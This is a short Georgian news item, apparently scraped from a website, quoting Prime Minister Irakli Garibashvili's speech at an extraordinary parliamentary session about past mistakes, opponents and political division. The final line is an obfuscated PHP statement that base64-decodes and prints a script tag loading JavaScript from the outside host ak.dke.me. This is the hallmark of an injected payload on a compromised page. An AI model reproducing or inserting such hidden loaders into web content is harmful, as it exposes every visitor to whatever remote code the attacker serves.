celsiusi
ავერსი საქკაბელი
მე არ ვიძახი, რომ ჩვენ ვართ უშეცდომო, პირიქით, ჩვენც ბევრი შეცდომა დავუშვით, მაგრამ არ ჩაგვიდენია დანაშაული, - აღნიშნული განცხადება პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა პარლამენტის რიგგარეშე სხდომაზე სიტყვით გამოსვლისას გააკეთა. 
 
„დღესაც სამწუხაროდ ვართ იქ, სადაც ვიყავით 1990-იან წლებში, ისევ დაყოფა, ისევ ერთმანეთის სიძულვილი, ცილისწამება და გაუთავებელი კინკლაობა. ამ დროს რა ხდება ჩვენს რეალობაში? ოპონენტებისგან მოვისმინე აბსურდული ბრალდებები, თითქოს შინაარსისგან დაცლილი ხედვა წარვადგინეთ, მაშინ, როცა დეტალურად ვისაუბრეთ ყველა მიმართულებაზე.
 
დეტალურად შევახსენეთ ჩვენს თავს, თუ ყველა მიმართულებით რამხელა პროგრესი გვაქვს. როცა ვესაუბრებით ოპონენტებს, დამნაშავეებს წინა ხელისუფლებიდან, რა თქმა უნდა კარგად უნდა გვახსოვდეს, ახსოვდეს ჩვენს ამომრჩეველს და მოსახლეობას, რომ შეცდომები აღარ უნდა გავიმეოროთ. არ გაქვს ამის უფლება“, - განაცხადა ღარიბაშვილმა.
1459
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");